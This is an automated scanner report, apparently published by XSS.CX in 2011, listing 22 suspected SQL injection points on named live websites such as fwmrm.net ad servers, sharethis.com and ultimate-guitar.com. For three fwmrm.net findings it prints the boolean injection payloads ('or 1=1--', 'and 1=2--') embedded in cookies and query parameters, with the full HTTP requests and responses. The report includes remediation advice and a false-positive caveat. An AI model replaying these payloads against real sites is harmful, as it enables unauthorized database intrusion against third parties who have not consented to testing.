SQL Injection, DORK, Report, Example, PoC, March 19, 2011

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Report generated by XSS.CX at Sat Mar 19 09:55:48 CDT 2011.

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog
Loading

1. SQL injection

1.1. http://1c6e9.v.fwmrm.net/ad/g/1 [_cph cookie]

1.2. http://1c6e9.v.fwmrm.net/ad/g/1 [flag parameter]

1.3. http://1c6e9.v.fwmrm.net/ad/g/1 [sfid parameter]

1.4. http://bestbuyon.com/listing/all [name of an arbitrarily supplied request parameter]

1.5. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

1.6. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

1.7. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.8. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.9. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.10. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.11. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.12. http://wd.sharethis.com/api/getApi.php [name of an arbitrarily supplied request parameter]

1.13. http://wd.sharethis.com/api/getApi.php [publisher parameter]

1.14. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [Referer HTTP header]

1.15. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [User-Agent HTTP header]

1.16. http://web.vindicosuite.com/Feeds/Generator/2.0/GetAdDirector.asp [rotationId parameter]

1.17. http://www.ultimate-guitar.com/about/job.htm [REST URL parameter 2]

1.18. http://www.ultimate-guitar.com/bands/t.htm [REST URL parameter 2]

1.19. http://www.ultimate-guitar.com/modules/rss/all_updates.xml.php [name of an arbitrarily supplied request parameter]

1.20. http://www.ultimate-guitar.com/search/suggest.php [REST URL parameter 2]

1.21. http://www.ultimate-guitar.com/xtra/click_contest.php [User-Agent HTTP header]

1.22. http://www.ultimate-guitar.com/xtra/click_contest.php [name of an arbitrarily supplied request parameter]


1. SQL injection
There are 22 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://1c6e9.v.fwmrm.net/ad/g/1 [_cph cookie]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://1c6e9.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The _cph cookie appears to be vulnerable to SQL injection attacks. The payloads 17292965'%20or%201%3d1--%20 and 17292965'%20or%201%3d2--%20 were each submitted in the _cph cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid=&cdid=&pvrn=y789t005dy&vprn=&vip=173.193.214.243&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="c007_5577003974315604268"; _auv="g158249~1.1299939850.5,14576.1299939850.5,^"; _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"17292965'%20or%201%3d1--%20; _sc="sg158249.1299937795.1299939858.28800.1250.156,"; _wr="g158249"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208

Response 1

HTTP/1.1 200 OK
Set-Cookie: _sid="c006_5585802266361004873";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="c007_5577003974315604268";expires=Sun, 18 Mar 2012 14:45:37 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="";expires=Mon, 18 Apr 2011 14:45:37 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545937.y789t005dy.266627~266628~,1300545928.8x3q1dfpr5.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:45:37 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545937.1300545937.28800.0.0,";expires=Mon, 18 Apr 2011 14:45:37 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g146942";expires=Mon, 18 Apr 2011 14:45:37 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:45:37 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3545525d5f4f58455e445a4a423208;path=/;httponly
Content-Length: 15849

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ads[0]._.ad;
           for (var a=0; a<ads.length; a++) {
               var ad = ads[a];
               for (var c=0; c<ad._.creatives[0]._.creative.length; c++) {
                   var creative = ad._.creatives[0]._.creative[c];
                   for (var r=0; r<creative._.creativeRenditions[0]._.creativeRendition.length; r++) {
                       var creativeRendition = creative._.creativeRenditions[0]._.creativeRendition[r];
                       for (var s=0; s<creativeRendition._.asset.length; s++) {
                           var asset = creativeRendition._.asset[s];
                           var content = asset._.content[0]._;
                           var contentType = asset.contentType;
                           crs['_'+creativeRendition.creativeRenditionId] = content;
                       }
                   }
               }
           }
           if (window.console) console.log("RE
...[SNIP]...

Request 2

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid=&cdid=&pvrn=y789t005dy&vprn=&vip=173.193.214.243&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="c007_5577003974315604268"; _auv="g158249~1.1299939850.5,14576.1299939850.5,^"; _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"17292965'%20or%201%3d2--%20; _sc="sg158249.1299937795.1299939858.28800.1250.156,"; _wr="g158249"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208

Response 2

HTTP/1.1 200 OK
Set-Cookie: _sid="c102_5585802270656011575";domain=.fwmrm.net;path=/;
Set-Cookie: _auv="";expires=Mon, 18 Apr 2011 14:45:38 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545938.y789t005dy.266627~266628~,1300545924.8x3q1dfpr5.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:45:38 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545938.1300545938.28800.0.0,";expires=Mon, 18 Apr 2011 14:45:38 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g146942";expires=Mon, 18 Apr 2011 14:45:38 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:45:37 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3145525d5f4f58455e445a4a423209;path=/;httponly
Content-Length: 15849

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ads[0]._.ad;
           for (var a=0; a<ads.length; a++) {
               var ad = ads[a];
               for (var c=0; c<ad._.creatives[0]._.creative.length; c++) {
                   var creative = ad._.creatives[0]._.creative[c];
                   for (var r=0; r<creative._.creativeRenditions[0]._.creativeRendition.length; r++) {
                       var creativeRendition = creative._.creativeRenditions[0]._.creativeRendition[r];
                       for (var s=0; s<creativeRendition._.asset.length; s++) {
                           var asset = creativeRendition._.asset[s];
                           var content = asset._.content[0]._;
                           var contentType = asset.contentType;
                           crs['_'+creativeRendition.creativeRenditionId] = content;
                       }
                   }
               }
           }
           if (window.console) console.log("RENDITIONS", crs);
           var cnt=0;
           for (var s=0; s<resp.siteSection[0]._.adSlots[0]._.adSlot.length; s++) {
       
...[SNIP]...
1.2. http://1c6e9.v.fwmrm.net/ad/g/1 [flag parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://1c6e9.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The flag parameter appears to be vulnerable to SQL injection attacks. The payloads 13903592'%20or%201%3d1--%20 and 13903592'%20or%201%3d2--%20 were each submitted in the flag parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid=&cdid=&pvrn=8x3q1dfpr5&vprn=&vip=173.193.214.243&vdur=&flag=-unka13903592'%20or%201%3d1--%20&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208; _sid="b008_5585799869769638198"; _uid="c007_5577003974315604268"; _auv="g146942~5.1300545381.0,20486.1300545381.0,^"; _pr="1300545380.y789t005dy.266627~266628~,"; _sc="sg146942.1300545379.1300545381.28800.0.0,"; _wr="g146942"

Response 1

HTTP/1.1 200 OK
Set-Cookie: _uid="c007_5577003974315604268";expires=Sun, 18 Mar 2012 14:41:34 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="g146942~5.1300545381.0,20486.1300545381.0,^";expires=Mon, 18 Apr 2011 14:41:34 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545680.y789t005dy.266627~266628~,1300545413.8x3q1dfpr5.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:41:34 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545379.1300545694.28800.0.0,";expires=Mon, 18 Apr 2011 14:41:34 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g146942";expires=Mon, 18 Apr 2011 14:41:34 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:41:34 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c3445525d5f4f58455e445a4a423208;path=/;httponly
Content-Length: 4756

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ads[0]._.ad;
           for (var a=0; a<ads.length; a++) {
               var ad = ads[a];
               for (var c=0; c<ad._.creatives[0]._.creative.length; c++) {
                   var creative = ad._.creatives[0]._.creative[c];
                   for (var r=0; r<creative._.creativeRenditions[0]._.creativeRendition.length; r++) {
                       var creativeRendition = creative._.creativeRenditions[0]._.creativeRendition[r];
                       for (var s=0; s<creativeRendition._.asset.length; s++) {
                           var asset = creativeRendition._.asset[s];
                           var content = asset._.content[0]._;
                           var contentType = asset.contentType;
                           crs['_'+creativeRendition.creativeRenditionId] = content;
                       }
                   }
               }
           }
           if (window.console) console.log("RENDITIONS", crs);
           var cnt=0
...[SNIP]...

Request 2

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid=&cdid=&pvrn=8x3q1dfpr5&vprn=&vip=173.193.214.243&vdur=&flag=-unka13903592'%20or%201%3d2--%20&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208; _sid="b008_5585799869769638198"; _uid="c007_5577003974315604268"; _auv="g146942~5.1300545381.0,20486.1300545381.0,^"; _pr="1300545380.y789t005dy.266627~266628~,"; _sc="sg146942.1300545379.1300545381.28800.0.0,"; _wr="g146942"

Response 2

HTTP/1.1 200 OK
Set-Cookie: _auv="g146942~5.1300545381.0,20486.1300545381.0,^";expires=Mon, 18 Apr 2011 14:41:35 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545680.8x3q1dfpr5.266627~266628~,1300545412.y789t005dy.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:41:35 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545379.1300545695.28800.0.0,";expires=Mon, 18 Apr 2011 14:41:35 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:41:35 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Set-Cookie: NSC_okcbewjq1.gxnsn.ofu=ffffffff09091c0e45525d5f4f58455e445a4a423208;path=/;httponly
Content-Length: 4756

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ads[0]._.ad;
           for (var a=0; a<ads.length; a++) {
               var ad = ads[a];
               for (var c=0; c<ad._.creatives[0]._.creative.length; c++) {
                   var creative = ad._.creatives[0]._.creative[c];
                   for (var r=0; r<creative._.creativeRenditions[0]._.creativeRendition.length; r++) {
                       var creativeRendition = creative._.creativeRenditions[0]._.creativeRendition[r];
                       for (var s=0; s<creativeRendition._.asset.length; s++) {
                           var asset = creativeRendition._.asset[s];
                           var content = asset._.content[0]._;
                           var contentType = asset.contentType;
                           crs['_'+creativeRendition.creativeRenditionId] = content;
                       }
                   }
               }
           }
           if (window.console) console.log("RENDITIONS", crs);
           var cnt=0;
           for (var s=0; s<resp.siteSection[0]._.adSlots[0]._.adSlot.length; s++) {
               var slot = resp.siteSection[0]._.adSlots[0]._.adSlot[s];
               for (var a=0; a<slot._.selectedAds[0]._.adReference.lengt
...[SNIP]...
1.3. http://1c6e9.v.fwmrm.net/ad/g/1 [sfid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://1c6e9.v.fwmrm.net
Path:   /ad/g/1

Issue detail

The sfid parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sfid parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid='%20and%201%3d1--%20&cdid=&pvrn=y789t005dy&vprn=&vip=173.193.214.243&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="c007_5577003974315604268"; _auv="g158249~1.1299939850.5,14576.1299939850.5,^"; _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"; _sc="sg158249.1299937795.1299939858.28800.1250.156,"; _wr="g158249"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208

Response 1

HTTP/1.1 200 OK
Set-Cookie: _sid="b008_5585800818957611742";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="c007_5577003974315604268";expires=Sun, 18 Mar 2012 14:40:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="";expires=Mon, 18 Apr 2011 14:40:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545600.8x3q1dfpr5.266627~266628~,1300545431.8x3q1dfpr5b8d9be6c5fc709fa0bdd09be.266627~266628~,1300545430.b8d9be6c40ff0c356d873f2c.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:40:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545600.1300545600.28800.0.0,";expires=Mon, 18 Apr 2011 14:40:00 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g146942";expires=Mon, 18 Apr 2011 14:40:00 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:40:00 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Content-Length: 15856

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
[
{_:{
"error":[
{id:"25", name:"INVALID_ASSET_ID", severity:"WARN", _:{
"context":[
{_:"-1"
}]}
}]}
}],
"visitor":[
{_:null
}],
"ads":[
{_:{
"ad":[
{adId:"266627", adUnit:"20486", _:{
"creatives":[
{_:{
"creative":[
{adUnit:"fixed-size-interactive", baseUnit:"fixed-size-interactive", creativeId:"118523", duration:"30", _:{
"creativeRenditions":[
{_:{
"creativeRendition":[
{adReplicaId:"0", creativeApi:"None", creativeRenditionId:"137315", height:"90", preference:"0", width:"728", _:{
"asset":[
{bytes:"3264", contentType:"text/html_lit_js_wc_nw", id:"133329", mimeType:"text/html", name:"external url/tag for Default asset package of - 1", _:{
"content":[
{_:"<span style=\"display:inline-block; vertical-align:top; margin:0px 0px 0px 0px;\"><iframe id=\"_fw_frame_728x90slot\" width=\"728\" height=\"90\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" scrolling=\"no\" ALLOWTRANSPARENCY=\"true\"><\/iframe>\n<script language=\"javascript\" type=\"text/javascript\" id=\"_fw_container_js_728x90slot\">//<!-- \n (function(){\n var fw_scope_window = window;\n var fw_scope = document;\n var fw_content = \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\">\\n<html>\\n<head>\\n\\t<title>Advertisement<\/title>\\n\\t<scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\">window._fw_page_url = \\\"http://www.foxsearchlight.com/insider/\\\";<\/scr\" + \"ipt>\\n<\/head>\\n<body style=\\\"margin:0px;background-color:transparent;\\\"><scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\"><!--\\ngoogle_ad_client = \\\"pub-2846859707368523\\\";\\n/* 728x90, created 10/22/08 */\\ngoogle_ad_slot = \\\"0266362223\\\";\\ngoogle_ad_width = 728;\\ngoogle_ad_height = 90;\\n//-->\\n<\/scr\" + \"ipt>\\n<scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\"\\nsrc=\\\"http://pagead2.googlesyndication.com/pagead/show_ads.js\\\">\\n<\/scr\" + \"ipt><\/body>\\n<\/html>\";\n var targetFrame = fw_scope.getElementById(\"_fw_frame_728x90slot\");\n v
...[SNIP]...

Request 2

GET /ad/g/1?nw=116450&asid=-1&asnw=&caid=&ssid=74316&ssnw=&csid=FSL_films&sfid='%20and%201%3d2--%20&cdid=&pvrn=y789t005dy&vprn=&vip=173.193.214.243&vdur=&flag=-unka&resp=smrx&crtp=ptiling&vclr=JS-pt-r3310;;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=728x90slot&envp=g_js&w=728&h=90&lo=&flag=+cmpn;prct=text%2Fhtml_lit_js_wc_nw&ptgt=s&slid=160x600slot&envp=g_js&w=160&h=600&lo=&flag=+cmpn HTTP/1.1
Host: 1c6e9.v.fwmrm.net
Proxy-Connection: keep-alive
Referer: http://www.foxsearchlight.com/insider/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _uid="c007_5577003974315604268"; _auv="g158249~1.1299939850.5,14576.1299939850.5,^"; _vr="1299939837..333670~333678~343034~345187~359443~366038~,"; _cph="1299938380.273.1.1,1299937795.439.1.1,"; _sc="sg158249.1299937795.1299939858.28800.1250.156,"; _wr="g158249"; NSC_twmbewjq3.gxnsn.ofu=ffffffff09097e3745525d5f4f58455e445a4a423208

Response 2

HTTP/1.1 200 OK
Set-Cookie: _sid="b008_5585800827546714523";domain=.fwmrm.net;path=/;
Set-Cookie: _uid="c007_5577003974315604268";expires=Sun, 18 Mar 2012 14:40:02 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _auv="";expires=Mon, 18 Apr 2011 14:40:02 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _pr="1300545602.y789t005dy.266627~266628~,1300545601.8x3q1dfpr5.266627~266628~,1300545431.8x3q1dfpr5b8d9be6c5fc709fa0bdd09be.266627~266628~,1300545430.b8d9be6c40ff0c356d873f2c.266627~266628~,1300545398.y789t005dyb8d9be6c550f47ce9a53dc03.266627~266628~,1300545397.b8d9be6cb0a7dc9508a95061.266627~266628~,";expires=Mon, 18 Apr 2011 14:40:02 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _sc="sg146942.1300545602.1300545602.28800.0.0,";expires=Mon, 18 Apr 2011 14:40:02 GMT;domain=.fwmrm.net;path=/;
Set-Cookie: _wr="g146942";expires=Mon, 18 Apr 2011 14:40:02 GMT;domain=.fwmrm.net;path=/;
X-FW-Power-By: Smart
Content-Type: text/javascript; charset=UTF-8
Pragma: no-cache
Vary: Accept-Encoding
Date: Sat, 19 Mar 2011 14:40:01 GMT
Server: FWS
P3P: policyref="http://www.freewheel.tv/w3c/p3p.xml",CP="ALL DSP COR NID"
Content-Length: 15842

(function() {
   var parseResponse = function(resp) {
       if (window.console) console.log("RESPONSE %o", resp);
       try {
           if (!resp.ads || !resp.siteSection) return;
           var crs = {};
           var ads = resp.ad
...[SNIP]...
[
{_:{
"error":[
{id:"25", name:"INVALID_ASSET_ID", severity:"WARN", _:{
"context":[
{_:"-1"
}]}
}]}
}],
"visitor":[
{_:null
}],
"ads":[
{_:{
"ad":[
{adId:"266628", adUnit:"20489", _:{
"creatives":[
{_:{
"creative":[
{adUnit:"fixed-size-interactive", baseUnit:"fixed-size-interactive", creativeId:"118522", duration:"30", _:{
"creativeRenditions":[
{_:{
"creativeRendition":[
{adReplicaId:"0", creativeApi:"None", creativeRenditionId:"137314", height:"600", preference:"0", width:"160", _:{
"asset":[
{bytes:"3273", contentType:"text/html_lit_js_wc_nw", id:"133328", mimeType:"text/html", name:"external url/tag for Default asset package of - 1", _:{
"content":[
{_:"<span style=\"display:inline-block; vertical-align:top; margin:0px 0px 0px 0px;\"><iframe id=\"_fw_frame_160x600slot\" width=\"160\" height=\"600\" marginwidth=\"0\" marginheight=\"0\" frameborder=\"0\" scrolling=\"no\" ALLOWTRANSPARENCY=\"true\"><\/iframe>\n<script language=\"javascript\" type=\"text/javascript\" id=\"_fw_container_js_160x600slot\">//<!-- \n (function(){\n var fw_scope_window = window;\n var fw_scope = document;\n var fw_content = \"<!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\">\\n<html>\\n<head>\\n\\t<title>Advertisement<\/title>\\n\\t<scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\">window._fw_page_url = \\\"http://www.foxsearchlight.com/insider/\\\";<\/scr\" + \"ipt>\\n<\/head>\\n<body style=\\\"margin:0px;background-color:transparent;\\\"><scr\" + \"ipt type=\\\"text/javascr\" + \"ipt\\\"><!--\\ngoogle_ad_client = \\\"pub-2846859707368523\\\";\\n/* 160x600, created 10/22/08 */\\ngoogle_ad_slot = \\\"2309176492\\\";\\ngoogle_ad_width = 